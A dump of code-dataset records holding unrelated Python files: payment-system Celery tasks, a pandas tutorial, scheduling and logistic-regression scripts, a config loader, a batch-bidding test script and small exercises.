'96'\n\t\t\tlgr.info(\"Error on Confirming Delivery Activity: %s\" % e)\n\n\t\treturn payload\n\n\n\n\nclass Trade(System):\n\tpass\n\n\nclass Payments(System):\n\tpass\n\n\n\n@app.task(ignore_result=True)\ndef callback_url_call(bill, cart):\n\tlgr = 
get_task_logger(__name__)\n\ttry:\n\t\tbill_manager = BillManager.objects.get(id=bill)\n\t\tcart_item = CartItem.objects.get(id=cart)\n\n\t\tpayload = json.loads(cart_item.details)\n\n\t\tpayload.update(json.loads(bill_manager.incoming_payment.request))\n\t\tpayload['quantity'] = cart_item.quantity\n\t\tpayload['currency'] = cart_item.currency.code\n\t\tpayload['amount'] = cart_item.total\n\n\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\tAPI_KEY = cart_item.api_gateway_profile.user.profile.api_key\n\t\tpayload = Authorize().return_hash(payload, API_KEY)\n\t\tnode = cart_item.api_callback_url\n\n\t\tlgr.info(\"Payload: %s| Node: %s\" % (payload, node) )\n\n\t\tpayload = WebService().post_request(payload, node)\n\n\t\tlgr.info('CallBack Response: %s' % payload)\n\t\tif 'response' in payload.keys(): cart_item.api_message = payload['response'][:128]\n\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='SENT')\n\t\telse:\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='FAILED')\n\n\t\tcart_item.save()\n\n\texcept Exception as e:\n\t\tlgr.info('Error on CallBack URL Call: %s' % e)\n\n\n@app.task(ignore_result=True)\n@transaction.atomic\ndef settle_orders(order_list):\n\tfor o in order_list:\n\t\torder = PurchaseOrder.objects.get(id=o)\n\t\torder.status = OrderStatus.objects.get(name='SETTLED')\n\t\torder.cart_processed = False\n\t\torder.save()\n\n\t\torder.cart_item.update(status=CartStatus.objects.get(name='SETTLED'))\n\n\n@app.task(ignore_result=True)\ndef order_background_service_call(order, status):\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\tfrom primary.core.bridge.tasks import Wrappers as BridgeWrappers\n\t\t#o = PurchaseOrder.objects.get(id=order)\n\t\tlgr.info('Started Order Service Call: %s' % order)\n\t\tbill = BillManager.objects.filter(order__id=order).last()\n\t\to = bill.order\n\t\tlgr.info('Captured Order: %s' % o)\n\t\tcart_item = o.cart_item.filter(Q(status__name=status), ~Q(Q(product_item__product_type__service=None),Q(product_item__product_type__settlement_service=None)))\n\t\tlgr.info('Cart Item: %s' % cart_item)\n\t\tfor c in cart_item:\n\t\t\tlgr.info('Captured Cart Item: %s | %s | %s' % (c,c.product_item.product_type.service, c.product_item.product_type.settlement_service))\n\t\t\tproduct_item = c.product_item\n\t\t\tpayload = json.loads(c.details)\t\n\n\t\t\tgateway_profile = c.gateway_profile\n\t\t\tservice = product_item.product_type.settlement_service if status == 'SETTLED' else product_item.product_type.service \n\n\t\t\tpayload['cart_item_id'] = c.id\n\t\t\tpayload['purchase_order_id'] = o.id\n\t\t\tpayload['product_item_id'] = c.product_item.id\n\t\t\tpayload['item'] = c.product_item.name\n\t\t\tpayload['product_type'] = c.product_item.product_type.name\n\t\t\tpayload['quantity'] = c.quantity\n\t\t\tpayload['currency'] = c.currency.code\n\t\t\tpayload['amount'] = c.total\n\t\t\tpayload['reference'] = o.reference\n\t\t\tpayload['institution_id'] = c.product_item.institution.id\n\t\t\tpayload['chid'] = c.channel.id\n\t\t\tpayload['ip_address'] = '127.0.0.1'\n\t\t\tpayload['gateway_host'] = '127.0.0.1'\n\n\n\t\t\tif bill.incoming_payment:\n\t\t\t\tpayload['paygate_incoming_id'] = bill.incoming_payment.id\n\t\t\t\tpayload['ext_inbound_id'] = bill.incoming_payment.ext_inbound_id\n\t\t\t\tpayload.update(bill.incoming_payment.request)\n\n\t\t\tpayload 
= dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\t\tpayload = BridgeWrappers().background_service_call(service, gateway_profile, payload)\n\n\t\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n@app.task(ignore_result=True)\ndef order_service_call(order):\n\tlgr = get_task_logger(__name__)\n\tfrom primary.core.api.views import ServiceCall\n\ttry:\n\t\tlgr.info('OrderID: %s' % order)\n\t\to = PurchaseOrder.objects.get(id=order)\n\t\tlgr.info('Captured Order: %s' % o)\n\t\tcart_item = o.cart_item.all()\n\t\tfor c in cart_item:\n\t\t\tlgr.info('Captured Cart Item: %s | %s' % (c,c.product_item.product_type.service))\n\t\t\tproduct_item = c.product_item\n\t\t\tpayload = json.loads(c.details)\t\n\n\t\t\tgateway_profile = c.gateway_profile\n\t\t\tservice = c.product_item.product_type.service\n\n\t\t\tpayload['cart_item_id'] = c.id\n\t\t\tpayload['purchase_order_id'] = o.id\n\t\t\tpayload['product_item_id'] = c.product_item.id\n\t\t\tpayload['item'] = c.product_item.name\n\t\t\tpayload['product_type'] = c.product_item.product_type.name\n\t\t\tpayload['quantity'] = c.quantity\n\t\t\tpayload['currency'] = c.currency.code\n\t\t\tpayload['amount'] = c.total\n\t\t\tpayload['reference'] = o.reference\n\t\t\t#payload['institution_id'] = c.product_item.institution.id\n\t\t\tpayload['chid'] = c.channel.id\n\t\t\tpayload['ip_address'] = '127.0.0.1'\n\t\t\tpayload['gateway_host'] = '127.0.0.1'\n\n\t\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\n\t\t\tpayload = ServiceCall().api_service_call(service, gateway_profile, payload)\n\t\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n\n\n@app.task(ignore_result=True)\ndef service_call(payload):\n\tlgr = get_task_logger(__name__)\n\tfrom primary.core.api.views import ServiceCall\n\ttry:\n\t\tpayload = json.loads(payload)\n\n\t\tpayload = dict(map(lambda x:(str(x[0]).lower(),json.dumps(x[1]) if isinstance(x[1], dict) else str(x[1])), payload.items()))\n\t\tservice = Service.objects.get(id=payload['service_id'])\n\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\tpayload = ServiceCall().api_service_call(service, gateway_profile, payload)\n\t\tlgr.info('\\n\\n\\n\\n\\t########\\tResponse: %s\\n\\n' % payload)\n\texcept Exception as e:\n\t\tpayload['response_status'] = '96'\n\t\tlgr.info('Unable to make service call: %s' % e)\n\treturn payload\n\n\n@app.task(ignore_result=True) #Ignore results ensure that no results are saved. 
Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_settled_order():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\torig_order = PurchaseOrder.objects.select_for_update(nowait=True).filter(Q(status__name='SETTLED'),Q(cart_processed=False))\n\t\torder = list(orig_order.values_list('id',flat=True)[:500])\n\n\t\tprocessing = orig_order.filter(id__in=order).update(cart_processed=True, date_modified=timezone.now())\n\t\tfor od in order:\n\t\t\tlgr.info('Order: %s' % od)\n\t\t\torder_background_service_call.delay(od, 'SETTLED')\n\texcept DatabaseError as e:\n\t\tlgr.info('Transaction Rolled Back')\n\t\ttransaction.set_rollback(True)\n\n\texcept Exception as e: lgr.info('Error on process settled order: %s' % e)\n\n\n@app.task(ignore_result=True) #Ignore results ensure that no results are saved. Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_paid_order():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\torig_order = PurchaseOrder.objects.select_for_update(nowait=True).filter(Q(status__name='PAID'),Q(cart_processed=False))\n\t\torder = list(orig_order.values_list('id',flat=True)[:500])\n\n\t\tprocessing = orig_order.filter(id__in=order).update(cart_processed=True, date_modified=timezone.now())\n\t\tfor od in order:\n\t\t\tlgr.info('Order: %s' % od)\n\t\t\torder_background_service_call.delay(od, 'PAID')\n\texcept DatabaseError as e:\n\t\tlgr.info('Transaction Rolled Back')\n\t\ttransaction.set_rollback(True)\n\n\texcept Exception as e: lgr.info('Error on process paid order: %s' % e)\n\n\n@app.task(ignore_result=True) #Ignore results ensure that no results are saved. Saved results on daemons would cause deadlocks and fillup of disk\n@transaction.atomic\n@single_instance_task(60*10)\ndef process_callback_url():\n\tlgr = get_task_logger(__name__)\n\ttry:\n\t\tlgr.info('Process CallBack URL')\n\n\t\tall_bill = BillManager.objects.filter(Q(order__status__name='PAID',order__cart_item__api_callback_status__name='CREATED'),\\\n\t\t\t\t\t~Q(order__cart_item__api_gateway_profile=None),~Q(incoming_payment=None),\\\n\t\t\t\t\t~Q(order__cart_item__api_callback_url__in=[None,''])).values_list('id','order__cart_item__id').distinct()[:500]\n\n\t\tlgr.info('Bill %s' % all_bill)\n\t\tbill = np.asarray(all_bill)\n\n\t\tlgr.info('BillL %s' % bill.size)\n\t\tlgr.info('BillL %s' % bill)\n\t\tif bill.size>0:\n\t\t\torig_cart = CartItem.objects.select_for_update(nowait=True).filter(id__in=bill[:,1])\n\n\t\t\tlgr.info('Cart Items List %s' % bill[:,1])\n\t\t\tprocessing = orig_cart.filter(id__in=bill[:,1].tolist()).update(api_callback_status=APICallBackStatus.objects.get(name='PROCESSING'), date_modified=timezone.now())\n\t\t\ttasks = []\n\t\t\tfor b, c in bill.tolist():\n\t\t\t\tlgr.info('Call Back: %s | %s' % (b, c))\n\t\t\t\ttasks.append(callback_url_call.s(b, c))\n\n\t\t\tchunks, chunk_size = len(tasks), 500\n\t\t\tcallback_tasks= [ group(*tasks[i:i+chunk_size])() for i in range(0, chunks, chunk_size) ]\n\n\n\texcept Exception as e: lgr.info('Error on process callback url: %s' % e)\n\t#except DatabaseError as e:\n\t#\tlgr.info('Transaction Rolled Back')\n\t#\ttransaction.set_rollback(True)\n\n\n\n","sub_path":"secondary/erp/pos/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":66173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295347966","text":"# -*- coding: utf-8 -*-\r\n\r\nimport 
pandas as pd\r\n\r\ninput_fname = './data/sales_2013.xlsx'\r\n# 인덱스로 사용할 열을 지정하여\r\n# 엑셀파일을 로딩하는 내용\r\n# - index_col 매개변수를 사용\r\nsales = pd.read_excel(input_fname, \r\n sheet_name='january_2013',\r\n index_col='Customer ID')\r\nprint(sales)\r\n\r\n# DataFrame의 각 열은 pandas의 Series 타입이 됩니다.\r\n# - 일차원 데이터 타입으로 인지됨\r\nsales_name = sales['Customer Name']\r\nprint(type(sales_name))\r\n\r\n# pandas의 Series 타입은 value_counts 메소드를 사용할 수\r\n# 있으며, 메소드의 실행 결과는 중복을 제거한 \r\n# 각 데이터의 개수가 반환됨\r\nsales_date = sales['Purchase Date']\r\nprint(sales_date.value_counts())\r\n\r\n# 조건식을 사용하여 데이터를 검색하는 예제\r\n# - 검색할 날자 데이터의 리스트\r\ndates = ['2013-01-01', '2013-01-11', '2013-01-31']\r\n# DataFrame을 사용하여 조건식을 만족하는 데이터를 추출하는 방법\r\n# - DataFrame변수명[출력할컬럼명][조건식]\r\n# - 조건식은 True, False의 값이 반환되는 식\r\n# - pandas의 Series 타입은 isin 메소드를 제공하며\r\n# 각 열의 데이터가 매개변수로 전달된 리스트 내부에 존재하는 경우\r\n# True의 값이 반환됨\r\nsales_condition1 = \\\r\nsales[['Customer Name', 'Sale Amount','Purchase Date']][\r\n sales['Purchase Date'].isin(dates)]\r\nprint(sales_condition1)\r\n\r\n# Sale Amount 컬럼의 값이 평균 이상인 경우의 데이터만\r\n# 추출하는 예쩨\r\nsales_condition2 = sales[['Customer Name', 'Sale Amount']][\r\n sales['Sale Amount'] >= sales['Sale Amount'].mean()]\r\nprint(sales_condition2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_07/pandas/pandas_03.py","file_name":"pandas_03.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564506180","text":"for i in range(1, 20):\n print(\"I is now {}\".format(i))\n\n# number = \"883,44,335,600,4564,3,55\"\n# for i in range(0, len(number)):\n# print(number[i]) # by using square bracket it print the character at position I\n\n# number = \"883,44,335,600,4564,3,55\"\n# for i in range(0, len(number)):\n# if number[i] in '0123456789': # display only numbers, without separators\n# print(number[i], end='') # using square bracket print the character at position I. end ='' change \\n to space\n\nnumber = \"883,44,335,600,4564,3,55\"\ncleanedNumber = ''\nfor i in range(0, len(number)):\n if number[i] in '0123456789': # display only numbers, without separators\n cleanedNumber = cleanedNumber + number[i] # number is a string. To perform math, convert to int with extra var\n# print(number[i], end='') # using square bracket print the character at position I. end ='' change \\n to space\n\nnewNumber = int(cleanedNumber) # in first block we got rid off strings and assign string numbers to new variable\nprint(\"The number is {}\".format(newNumber)) # in second block we converted our digits into the int format\n","sub_path":"forloops.py","file_name":"forloops.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577604645","text":"# Copyright (c) 2020 Aiven, Helsinki, Finland. 
https://aiven.io/\n\nimport json\nimport os\nfrom abc import abstractmethod\n\nREQUIRED = {\n \"aws_access_key_id\",\n \"aws_secret_access_key\",\n \"bucket_name\",\n \"bucket_region\",\n \"max_workers\",\n \"upstream_repositories\",\n}\n\nDEFAULTS = {\n \"scratch_dir\": \"/var/tmp/\",\n \"max_workers\": 4,\n}\n\n\nclass ConfigError(ValueError):\n pass\n\n\nclass Config:\n aws_access_key_id = None\n aws_secret_access_key = None\n bucket_name = None\n bucket_region = None\n scratch_dir = None\n max_workers = None\n upstream_repositories = None\n _config = DEFAULTS\n\n def __init__(self):\n self.load()\n\n def load(self):\n self._config.update(DEFAULTS)\n self._populate_required()\n missing = REQUIRED.difference(set(self._config))\n if missing:\n raise ConfigError(f\"Missing required items: {missing}\")\n for key, value in self._config.items():\n setattr(self, key, value)\n\n @abstractmethod\n def _populate_required(self):\n pass\n\n def __repr__(self):\n return f\"{type(self).__name__}<{repr(self._config)}>\"\n\n\nclass ENVConfig(Config):\n def _populate_required(self):\n config_options = list(REQUIRED) + list(DEFAULTS)\n for key in sorted(config_options):\n value = os.environ.get(key.upper())\n if not value:\n if key not in DEFAULTS:\n raise ConfigError(f\"Missing required environment variable: {key.upper()}\")\n else:\n continue\n elif key == \"upstream_repositories\":\n value = value.split(\",\")\n elif key == \"max_workers\":\n value = int(value)\n self._config[key] = value\n\n\nclass JSONConfig(Config):\n def __init__(self, path):\n self.path = path\n super().__init__()\n\n def _populate_required(self):\n with open(self.path) as f:\n self._config.update(json.load(f))\n\n\nclass DictConfig(Config):\n def __init__(self, config_dict):\n self._config.update(config_dict)\n super().__init__()\n\n def _populate_required(self):\n pass\n","sub_path":"rpm_s3_mirror/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554148114","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'admin'\n\nimport Queue\nimport threading\nfrom BidByAPI_Quo import SignUP_mainSingleUser, Bid_mainSingleUser, QA, PRD, PRDTest, PRE, SigntenderFile_mainSingleUser, ViewCalibration_mainSingleUser\n\nqueue = Queue.Queue()\nuserlist = open('user.txt', 'r')\nmy_list = userlist.readlines()\nUserCount = 197\nfor row in my_list[:UserCount]:\n queue.put(row)\n\n# 环境:QA , PRD, PRDTest, PRE\nsite = PRD\n# 招标 SysNo\nTenderID = 1100389\n# 线程数\nThreadCount = 20\n# 操作\n# step =\n\n\ndef _run():\n while 1:\n try:\n row = queue.get_nowait()\n row = row.split(',')\n try:\n # SignUP_mainSingleUser(row[0], row[1], site, TenderID)\n SigntenderFile_mainSingleUser(row[0], row[1], site, TenderID)\n # Bid_mainSingleUser(row[0], row[1], site, TenderID)\n #ViewCalibration_mainSingleUser(row[0], row[1], site, TenderID)\n except Exception as ee:\n print(ee)\n print(row[0], 'error')\n except Exception as e:\n print(e)\n return\n\n\nts = [threading.Thread(target=_run, name='threading1') for i in range(ThreadCount)]\nfor t in ts:\n t.start()\nt.join()\n","sub_path":"Python3-BidByAPI/BatchBid.py","file_name":"BatchBid.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266150708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n##-------- [PPC] Jobshop Scheduling ---------\n# * Author: Colin, Lee\n# 
* Date: Apr 30th, 2020\n# * Description:\n# Using the event-driven scheuling method\n# to solve the JSS prob. Here is a sample\n# code with the style of OOP. Feel free to\n# modify it as you like.\n##--------------------------------------------\n#\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom gantt_plot import Gantt\n\ninfinity = float('inf')\n\n#entity\nclass Order:\n def __init__(self, ID, AT, DD, routing, PT):\n self.ID = ID\n self.AT = AT #AT: arrival time\n self.DD = DD #DD: due date\n\n self.PT = PT #PT: processing time\n self.routing = routing\n self.progress = 0\n\n#resource in factory\nclass Source:\n def __init__(self, order_info):\n self.order_info = order_info\n self.output = 0\n\n def arrival_event(self, fac):\n order_num = self.order_info.shape[0] #num of total orders\n\n #generate and release the order\n ID = self.order_info.loc[self.output, \"ID\"]\n routing = self.order_info.loc[self.output, \"routing\"].split(',')\n PT = [int(i) for i in self.order_info.loc[self.output, \"process_time\"].split(',')]\n DD = self.order_info.loc[self.output, \"due_date\"]\n AT = T_NOW\n order = Order(ID, AT, DD, routing, PT)\n if LOG == True:\n print(\"{} : order {} release.\".format(T_NOW, order.ID))\n\n self.output += 1\n\n #update the future event list - next order arrival event\n if self.output < order_num:\n fac.event_lst.loc[\"Arrival\"][\"time\"] = self.order_info.loc[self.output, \"arrival_time\"]\n else:\n fac.event_lst.loc['Arrival']['time'] = infinity\n\n #send order to correlated station\n target = order.routing[order.progress]\n machine = fac.machines[target]\n machine.buffer.append(order)\n\n #update the future event list - dispatch machines to process the jobs\n if machine.state == 'idle':\n fac.event_lst.loc[\"dispatching\"]['time'] = T_NOW\n\nclass Machine:\n def __init__(self, ID, DP_rule):\n self.ID = ID\n self.state = 'idle'\n self.buffer = []\n self.wspace = [] #wspace: working space\n self.DP_rule = DP_rule\n\n def start_processing(self, fac):\n #check state\n if self.state == 'idle':\n #get a new order from buffer by DP_rule\n if len(self.buffer) > 0:\n if self.DP_rule == \"FIFO\":\n order = self.buffer[0]\n elif self.DP_rule == \"EDD\":\n idx = np.argmin([j.DD for j in self.buffer])\n order = self.buffer[idx]\n elif self.DP_rule == \"SPT\":\n idx = np.argmin([j.PT[j.progress] for j in self.buffer])\n order = self.buffer[idx]\n\n #remove order from buffer\n self.buffer.remove(order)\n\n #start processing the order\n self.wspace.append(order)\n self.state = 'busy'\n processing_time = order.PT[order.progress]\n\n #[Gantt plot preparing] udate the start/finish processing time of machine\n fac.gantt_plot.update_gantt(self.ID, T_NOW, processing_time, order.ID)\n if LOG == True:\n print(\"{} : machine {} start processing order {} - {} progress\".format(T_NOW, self.ID, order.ID, order.progress))\n\n #update the future event list - job complete event\n fac.event_lst.loc[\"{}_complete\".format(self.ID)]['time'] = T_NOW + processing_time\n order.progress += 1\n\n def end_process_event(self, fac):\n order = self.wspace[0]\n if LOG == True:\n print(\"{} : machine {} complete order {} - {} progress\".format(T_NOW, self.ID, order.ID, order.progress))\n self.wspace.remove(order)\n self.state = 'idle'\n\n #send the processed order to next place\n if order.progress >= len(order.routing):\n #update factory statistic\n fac.throughput += 1\n #update order statistic\n fac.update_order_statistic(order)\n else:\n #send the order to next station\n target = 
order.routing[order.progress]\n next_machine = fac.machines[target]\n next_machine.buffer.append(order)\n\n #update the future event list - wait for the dispatching to get a new job\n fac.event_lst.loc[\"dispatching\"]['time'] = T_NOW\n fac.event_lst.loc[\"{}_complete\".format(self.ID)][\"time\"] = infinity\n\nclass Factory:\n def __init__(self, order_info, DP_rule):\n self.order_info = order_info\n self.DP_rule = DP_rule\n self.event_lst = pd.DataFrame(columns=[\"event_type\", \"time\"])\n\n #[Plug in] tool of gantt plotting\n self.gantt_plot = Gantt()\n\n #statistics\n self.throughput = 0\n self.order_statistic = pd.DataFrame(columns = [\"ID\", \"release_time\", \"complete_time\", \"due_date\", \"flow_time\", \"tardiness\", \"lateness\"])\n\n #build ur custom factory\n self.__build__()\n\n def __build__(self):\n self.source = Source(self.order_info)\n self.machines = {'A': Machine('A', self.DP_rule),\n 'B': Machine('B', self.DP_rule),\n 'C': Machine('C', self.DP_rule)}\n\n def initialize(self, order_info):\n self.event_lst.loc[0] = [\"Arrival\", order_info.loc[0, \"arrival_time\"]]\n self.event_lst.loc[1] = [\"A_complete\", infinity]\n self.event_lst.loc[2] = [\"B_complete\", infinity]\n self.event_lst.loc[3] = [\"C_complete\", infinity]\n self.event_lst.loc[4] = [\"dispatching\", infinity]\n self.event_lst = self.event_lst.set_index('event_type')\n\n def next_event(self, stop_time):\n global T_NOW, T_LAST\n T_NOW, T_LAST = infinity, infinity\n self.initialize(self.order_info)\n T_NOW = self.event_lst.min()[\"time\"]\n event_type = self.event_lst['time'].astype(float).idxmin()\n\n while T_NOW < stop_time:\n # print()\n # print(self.event_lst)\n # print()\n self.event(event_type)\n T_LAST = T_NOW\n T_NOW = self.event_lst.min()[\"time\"]\n event_type = self.event_lst['time'].astype(float).idxmin()\n\n T_NOW = stop_time\n self.makespan = T_LAST\n\n def event(self, event_type):\n #Arrival event\n if event_type == 'Arrival':\n self.source.arrival_event(self)\n\n #Complete event\n elif event_type == 'A_complete':\n self.machines['A'].end_process_event(self)\n elif event_type == 'B_complete':\n self.machines['B'].end_process_event(self)\n elif event_type == 'C_complete':\n self.machines['C'].end_process_event(self)\n\n #Dispatch event\n else:\n for mc in self.machines.values():\n mc.start_processing(self)\n self.event_lst.loc[\"dispatching\"]['time'] = infinity\n\n def update_order_statistic(self, order):\n ID = order.ID\n AT = order.AT\n DD = order.DD\n complete_time = T_NOW\n flow_time = complete_time - AT\n lateness = complete_time - DD\n tardiness = max(0, lateness)\n self.order_statistic.loc[ID] = [ID, AT, complete_time, DD, flow_time, tardiness, lateness]\n\n\nLOG = True\nstop_time = 500\n\nif __name__ == '__main__':\n #read the input data sheet\n data_dir = os.getcwd() + \"/data/\"\n order_info = pd.read_excel(data_dir + \"order_information.xlsx\")\n\n #data preprocessing\n order_info = order_info.sort_values(['arrival_time']).reset_index(drop=True)\n\n #choose the dispatching policy u'd like\n DP_rule = 'EDD' # 'SPT' #\n\n #build the factory\n fac = Factory(order_info, DP_rule)\n\n #start the simulation\n fac.next_event(stop_time)\n\n #output result\n print(fac.order_statistic.sort_values([\"ID\"]))\n print(\"Makespan = \", fac.makespan)\n fac.gantt_plot.draw_gantt()\n","sub_path":"src/ppc_jobShop.py","file_name":"ppc_jobShop.py","file_ext":"py","file_size_in_byte":8178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"91242843","text":"from exceptions import WrongArgumentException\n\n\nclass CLI:\n\n def __init__(self, fd):\n self.__fd = fd\n self._commands = {\n \"meal\": fd.add_meal,\n \"list\": fd.list_diary,\n \"exit\": self.__exit,\n \"help\": self.__help_message\n }\n self.__is_in_program = True\n\n def __help_message(self, *args):\n return \"Help message:\\n\\\n1.meal - add meal to diary.\\n\\\n2.list
- list all meals for that day.\\n\\\n3.help - show help message.\\n\\\n4.exit - exit from diary.\\n\"\n\n def __exit(self, *args):\n self.__is_in_program = False\n return \"Goodbye\"\n\n def start(self):\n print(\"Hello and welcome!\")\n print(self.__help_message())\n\n while self.__is_in_program:\n user_input = input(\"Enter command> \")\n split_user_input = user_input.split()\n argument = ''\n try:\n if len(split_user_input) == 0:\n raise WrongArgumentException(\"You\\\nhave to enter some command!\")\n elif len(split_user_input) > 1:\n argument = split_user_input[1]\n\n command = split_user_input[0]\n\n print(self._commands[command](argument))\n except WrongArgumentException as e:\n print(e)\n except WrongDimensionexception as e:\n print(e)\n except:\n print(\"Something went wrong. Try again!\")\n","sub_path":"week01/food_diary_extended/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330435959","text":"import pandas as pd\r\npd.plotting.register_matplotlib_converters()\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nprint(\"This is how SearchTrend behave \")\r\n\r\n# Path of the file to read\r\nSearchTrend = \"SearchTrend.csv\"\r\n\r\n# Read the file into a variable Search_data\r\nSearch_data = pd.read_csv(SearchTrend, index_col=\"date\", parse_dates=True)\r\n# Print the first 5 rows of the data\r\nprint(Search_data.head())\r\n\r\n\r\n# Set the width and height of the figure\r\nplt.figure(figsize=(16,6))\r\n\r\n# Line chart showing how SearchTrend evolved over time\r\nsns.lineplot(hue=\"region\", style=\"event\" , data=Search_data)\r\nplt.title(\"Search Trend of Influences as of years\")\r\nplt.xlabel('Years(2016 - 2020)')\r\nplt.ylabel('Search Trend')\r\n#plt.show()\r\nplt.savefig('Searchtrends.png')\r\n","sub_path":"CovidProjects0409/deseases_nature.py","file_name":"deseases_nature.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518039530","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n\nif __name__ == '__main__':\n arr = []\n result = -100000\n \n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n \n for ver in range(0, 4):\n for row in range(0, 4):\n a = arr[0 + ver][0 + row]\n b = arr[0 + ver][1 + row]\n c = arr[0 + ver][2 + row]\n d = arr[1 + ver][1 + row]\n e = arr[2 + ver][0 + row]\n f = arr[2 + ver][1 + row]\n g = arr[2 + ver][2 + row]\n \n if (a, b, c, d, e, f, g) != 0:\n if result < sum([a, b, c, d, e, f, g]):\n result = sum([a, b, c, d, e, f, g]) \n \n print(result)","sub_path":"Python/30Days/Day 11 2D Arrays.py","file_name":"Day 11 2D Arrays.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37116968","text":"import RPLidar\n \n# Setup the RPLidar\nPORT = '/dev/ttyUSB0'\nlidar = RPLidar(None, PORT)\n\nmax_distance = 0\n\ndef process_data(data):\n global max_distance\n for angle in range(360):\n distance = data[angle]\n if distance > 0: # ignore initially ungathered data points\n max_distance = max([min([5000, distance]), max_distance])\n radians = angle * pi / 180.0\n x = distance * cos(radians)\n y = distance * sin(radians)\n point = (160 + int(x / max_distance * 119), 120 + int(y / max_distance * 119))\n print(point)\n \nscan_data = [0]*360\n \ntry:\n 
print(lidar.info)\n for scan in lidar.iter_scans():\n for (_, angle, distance) in scan:\n scan_data[min([359, floor(angle)])] = distance\n process_data(scan_data)\n \nexcept KeyboardInterrupt:\n print('Stoping.')\nlidar.stop()\nlidar.disconnect()","sub_path":"rplidar/rplidar_distance_01.py","file_name":"rplidar_distance_01.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147099829","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.optimize as opt\n\nfrom cost import log_cost\nfrom map_feature import map_feature\nfrom predict import predict\n\n\n# Logistic Regression using scipy.optimize.minimize and regularization\n\n\n# Load Data\n\nfilename = 'microchip_tests.txt'\ndf = pd.read_csv(filename, header=None, names=['Test 1', 'Test 2', 'Accepted'])\n\n\n# Plot Data\n\npositive = df[df['Accepted'].isin([1])]\nnegative = df[df['Accepted'].isin([0])]\n\nplt.scatter(positive['Test 1'], positive['Test 2'], s=15, c='b', marker='o', label='Accepted')\nplt.scatter(negative['Test 1'], negative['Test 2'], s=15, c='r', marker='x', label='Not Accepted')\n\nplt.legend()\nplt.xlabel(\"Microchip Test 1\")\nplt.ylabel(\"Microchip Test 2\")\nplt.show()\n\n\n# Convert DataFrames to ndarrays\n\ndf.insert(0, 'Ones', 1)\n\ncols = df.shape[1]\nx = df.iloc[:, 0:cols-1]\ny = df.iloc[:, cols-1:cols]\n\nx = x.values\ny = y.values\n\n# Map Features (for microchip test)\nx = map_feature(x[:, 1], x[:, 2], degree=6)\n\n# Create Theta\ntheta = np.array([[0 for _ in range(x.shape[1])]])\n\n# Set Hyperparameter\nhyper_p = 0.01\n\n\n# Minimize Function\n\noptions = {'maxiter': 400}\nres = opt.minimize(log_cost, theta, (x, y, hyper_p), jac=True, method='TNC', options=options)\n\ncost = res.fun\nprint(f\"The current cost is: {cost}\")\nnew_theta = res.x\n\n\n# Determine Accuracy\n\naccuracy = predict(new_theta, x, y)\nprint(f\"Accuracy = {accuracy}%\")\n","sub_path":"logistic-regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 